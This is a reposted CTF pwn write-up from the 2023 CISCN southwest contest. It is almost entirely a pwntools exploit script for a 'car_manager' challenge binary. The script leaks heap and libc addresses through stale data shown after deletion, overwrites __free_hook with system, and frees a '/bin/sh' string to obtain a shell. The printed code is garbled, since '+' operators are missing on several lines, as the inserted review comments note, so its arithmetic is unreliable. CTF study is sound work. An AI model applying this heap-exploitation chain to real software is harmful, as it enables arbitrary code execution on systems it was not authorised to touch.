[原创]2023ciscn西南赛区pwn writeup

# _*_ coding:utf-8 _*_

from pwn import *

import re

import os, struct, random, time, sys, signal

import hashlib

from hashlib import sha256

 

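# Target process plus the pwntools ELF handles the rest of the script uses.
# The page prints the constructor as ``elf(...)``; pwntools exports it as
# ``ELF``, and as printed the line would fail with NameError before the
# process is even spoken to.
p = process("./car_manager")
elf = ELF("./car_manager")
libc = elf.libc  # the libc pwntools pairs with this binary on this host

context.log_level = "debug"  # "info" for a quieter run
context.arch = elf.arch
context.terminal = ['tmux', 'splitw', '-hp', '64']  # used when dbg() attaches gdb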

 

 

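def dbg(breakpoint=''):
    """Attach gdb to the target and pause the script.

    breakpoint: either a gdb script string passed through unchanged, or an
        int offset into the binary, in which case a ``b *addr`` command is
        built from it.  For a PIE binary the offset is added to the load
        address read from ``pmap``; otherwise it is used as-is.
    """
    if elf.pie:
        # Runs `pmap <pid>| awk '{print $1}'` (the \x27/\x24 escapes are the
        # quote and dollar characters); the first column of the second output
        # line is the address of the first mapping, which the script takes as
        # the load address of the main binary.
        cmd = 'pmap {}| awk \x27{{print \x241}}\x27'.format(p.pid)
        with os.popen(cmd) as out:
            elf_base = int(out.readlines()[1], 16)
    else:
        elf_base = 0
    if isinstance(breakpoint, int):
        # The page printed this as `int(breakpoint) elf_base`; the `+`
        # between the two terms was lost in extraction.
        script = 'b *{:#x}\n'.format(breakpoint + elf_base)
    else:
        script = breakpoint
    gdb.attach(p, script)
    pause()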

 

#-----------------------------------------------------------------------------------------

def s(data):
    """Send str(data) to the target as-is (no trailing newline)."""
    return p.send(str(data))


def sa(text, data):
    """Wait until ``text`` has been received, then send str(data)."""
    return p.sendafter(text, str(data))


def sl(data):
    """Send str(data) followed by a newline."""
    return p.sendline(str(data))


def sla(text, data):
    """Wait until ``text`` has been received, then send str(data) plus a newline."""
    return p.sendlineafter(text, str(data))


def r(num=4096):
    """Receive up to ``num`` bytes from the target."""
    return p.recv(num)


def ru(text):
    """Receive everything up to and including ``text``."""
    return p.recvuntil(text)


def ia():
    """Hand the connection over to the user."""
    return p.interactive()


def hs256(data):
    """Hex SHA-256 digest of str(data)."""
    return sha256(str(data).encode()).hexdigest()


def l32():
    """Read until a 0xf7 byte and unpack the last 4 bytes with pwntools u32.

    Endianness follows ``context``; the pattern is a str, as in the original
    Python 2 style script.
    """
    return u32(p.recvuntil("\xf7")[-4:].ljust(4, "\x00"))


def l64():
    """Read until a 0x7f byte, zero-pad the last 6 bytes to 8 and unpack with u64."""
    return u64(p.recvuntil("\x7f")[-6:].ljust(8, "\x00"))


def uu32():
    """Receive 4 raw bytes and unpack them with pwntools u32."""
    return u32(p.recv(4).ljust(4, '\x00'))


def uu64():
    """Receive 6 raw bytes, zero-pad to 8 and unpack them with pwntools u64."""
    return u64(p.recv(6).ljust(8, '\x00'))


def int16(data):
    """Parse ``data`` as a base-16 string."""
    return int(data, 16)


def lg(s):
    """Log ``<name> -> 0x<value>`` for the script variable named by ``s``.

    The name is resolved with eval() against this script's own namespace; it
    is only ever called here with literal variable names written in this
    file, never with text that came back from the target.
    """
    return p.success('%s -> 0x%x' % (s, eval(s)))

# sc      = lambda                    :shellcraft.amd64.linux.sh()

#-----------------------------------------------------------------------------------------

 

 

def add(make, model, year, size, pressure):
    """Drive menu option 1 (add a car), answering each prompt in turn."""
    answers = (
        ("please enter your choice:", 1),
        ("enter the make of the car: ", make),
        ("enter the model of the car: ", model),
        ("enter the year of the car: ", year),
        ("enter the size of tire : ", size),
        ("enter the pressure of tire : ", pressure),
    )
    for prompt, value in answers:
        sla(prompt, value)

 

def dele(idx):
    """Drive menu option 2 (delete the car at ``idx``)."""
    answers = (
        ("please enter your choice:", 2),
        ("enter the index of the car to delete: ", idx),
    )
    for prompt, value in answers:
        sla(prompt, value)

 

def find(make, model, year):
    """Drive menu option 3 (look up a car by make, model and year)."""
    answers = (
        ("please enter your choice:", 3),
        ("enter the make of the car to find: ", make),
        ("enter the model of the car to find: ", model),
        ("enter the year of the car to find: ", year),
    )
    for prompt, value in answers:
        sla(prompt, value)

 

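def edit(idx, make, model, year, choice, tire_size, tire_pressure, tire_idx=None):
    """Drive menu option 4 (modify the car at ``idx``).

    choice: answer to the "change all tires?" prompt. The integer 1 takes the
        all-tyres path; any other value (including the string '1') is followed
        by a single tyre-index prompt before the size/pressure prompts.
    tire_idx: index sent on the single-tyre path. Defaults to None — the page
        spells this ``none``, which is not a Python name and would raise
        NameError when the function definition is executed.
    """
    sla("please enter your choice:", 4)
    sla("enter the index of the car to modify: ", idx)
    sla("enter the new make of the car: ", make)
    sla("enter the new model of the car: ", model)
    sla("enter the new year of the car: ", year)
    sla("do you want to change all tires?(1/0)", choice)
    if choice != 1:
        # single-tyre path: the program asks which tyre before the new values
        sla("enter the idx of tire : ", tire_idx)
    sla("enter the new size of tire : ", tire_size)
    sla("enter the new pressure of tire : ", tire_pressure)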

 

def copy(idx):
    """Drive menu option 5 (duplicate the car at ``idx``)."""
    menu_choice = 5
    index_prompt = "enter the index of the car to copy: "
    sla("please enter your choice:", menu_choice)
    sla(index_prompt, idx)

 

 

def show():
    """Drive menu option 6 (list every car)."""
    menu_prompt = "please enter your choice:"
    sla(menu_prompt, 6)

 

# Populate the car table with 0x101 entries (indices 0..256). Everything but
# the model (the loop index) is constant; the tyre size and pressure of 0x10
# are placeholders at this point.
for i in range(0x101):

    add('e4l4',i,1999,0x10,0x10)





# Duplicate entries 0 and 255, delete entry 0, then list the table.
copy(0)

copy(255)

dele(0)

show()

# show() prints tyre sizes and pressures as decimal integers. The script
# skips the first size field and reads the second, then does the same for
# the pressures; judging by the variable names these two values are the low
# and high 32-bit halves of a heap address that the listing exposes for the
# entry that was just deleted. On the program side, clearing or invalidating
# an entry on delete would keep a later listing from printing stale data.
ru("tire sizes: 0, ")

heap_base_2 = int((ru(",")[:-1]),10)

lg('heap_base_2')



ru("tire pressures: 0, ")

heap_base_1 = int((ru(",")[:-1]),10)

lg('heap_base_1')



# NOTE(review): the binary operator between ``(heap_base_1 << 32)`` and
# ``heap_base_2`` was lost when this page was extracted (the line is not
# valid Python as printed); the same gap appears on the unsort_heap_1/2,
# edit(256, ...), libc_base, free_hook and system lines below. Check the
# original post before reading anything into these expressions. 0x011eb0 is
# an offset the author computed for this build and is not explained on the
# page.
heap_base = (heap_base_1 << 32) heap_base_2-0x011eb0

lg('heap_base')



# Split a second heap address (heap_base plus a fixed offset) into 32-bit
# halves and write them into entry 256 through the "change all tires" path
# of edit(): the low half goes to the tyre-size field and the high half to
# the tyre-pressure field. A fresh add() follows.
unsort_heap_2 = (heap_base 0x01a0b0)&0xffffffff

unsort_heap_1 = (heap_base 0x01a0b0)>>32

edit(256,'e4l4',1,1999,1,unsort_heap_2 0x10,unsort_heap_1)

add('e4l4',259,1999,0,0)



# List again and read the second size/pressure pair printed for car 258.
# The names say these halves form a libc address; 0x1ecbe0 is the author's
# offset from it to the libc base (again not explained on the page).
show()

ru("car 258:")

ru(", ")

libc_base_2 = int((ru(",")[:-1]),10)

ru("tire pressures: ")

ru(", ")

libc_base_1 = int((ru(",")[:-1]),10)

libc_base = (libc_base_1 << 32) libc_base_2-0x1ecbe0

lg("libc_base")



# libc offsets hard-coded for the libc build the challenge shipped with;
# they differ for any other build. sh is the seven bytes of "/bin/sh" read
# as a little-endian integer.
free_hook = libc_base 0x1eee48

system = libc_base 0x52290

sh = 0x68732f6e69622f



# Delete entry 257, list once more, then use the single-tyre path of edit()
# on entry 254 twice: tyre 1 receives the two halves of free_hook and tyre 0
# the two halves of sh. The final add() supplies the halves of system as the
# new car's tyre size/pressure, and deleting entry 254 is the last action
# before the script drops into an interactive session.
dele(257)

show()



edit(254,'e4l4',1,1999,0,free_hook&0xffffffff,free_hook>>32,1)

edit(254,'e4l4',1,1999,0,sh&0xffffffff,sh>>32,0)

add('e4l4','e4l4',1999,system&0xffffffff,system>>32)

dele(254)



ia()

原文链接:https://bbs.kanxue.com/thread-277650.htm

网络摘文,本文作者:15h,如若转载,请注明出处:https://www.15cov.cn/2023/08/27/原创2023ciscn西南赛区pwn-writeup/
